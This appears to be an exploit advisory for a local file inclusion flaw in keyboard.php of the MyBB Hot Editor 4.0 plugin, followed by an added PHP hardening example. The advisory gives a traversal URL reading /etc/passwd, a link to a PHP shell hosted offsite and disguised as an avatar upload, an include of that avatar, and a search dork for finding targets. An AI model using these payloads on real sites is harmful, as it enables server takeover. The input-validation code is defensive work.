The MyBB Hot Editor plugin version 4.0 suffers from a local file inclusion vulnerability in the "first" variable in keyboard.php.
4acfe1429e3c6665582ad8a653da47543cf23e72c2de86b14572ade8f99554bd
<html><head><title>Mybb Hot Editor Plugin Local File Inclusion</title></head><pre><?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0@expw0rm.com
---------------------------------------
Vul. Code : keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/
http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd
And
upload php shell => http://www.expw0rm.com/avatar_36.zip
http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => the target does not display in IE; please use Firefox
Dork: "MTR Paket :"
?>
// Exploit Worm www.expw0rm.com</pre></html>
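A hardened form of the include at keyboard.php line 3, as an added example that is not part of the original advisory or the plugin's own code. The helper name `resolve_layout`, the rule that layout files end in `.php`, and the sample file name `english.php` are assumptions.

```php
<?php
// Added example: validate the "first" parameter before it reaches require_once.
// Assumption: legitimate layout files live directly in ./vk_code/ and end in .php.

function resolve_layout(string $name, string $baseDir): ?string
{
    // 1. Syntax allowlist: a bare file name, no path separators, no "..",
    //    no NUL bytes, and only the expected extension.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $name)) {
        return null;
    }

    // 2. Canonicalise and require the result to sit inside the base directory,
    //    which also catches symlinks that point elsewhere.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: the two value shapes from the advisory plus a
    // hypothetical legitimate name (accepted only if the file really exists).
    $samples = [
        '../../../etc/passwd',
        '../../uploads/avatars/avatar_36.gif',
        'english.php',
    ];
    foreach ($samples as $s) {
        printf("%-40s %s\n", $s, resolve_layout($s, __DIR__ . '/vk_code') ?? 'REJECTED');
    }
    exit;
}

// Vulnerable form from the advisory, for comparison:
//   require_once "./vk_code/$first";
$first = $_GET['first'] ?? '';
$file  = is_string($first) ? resolve_layout($first, __DIR__ . '/vk_code') : null;
if ($file === null) {
    http_response_code(400);
    exit('Invalid layout');
}
require_once $file;
```

Both request values shown in the advisory fail the first check: the traversal string contains path separators, and the uploaded avatar does not carry the expected extension.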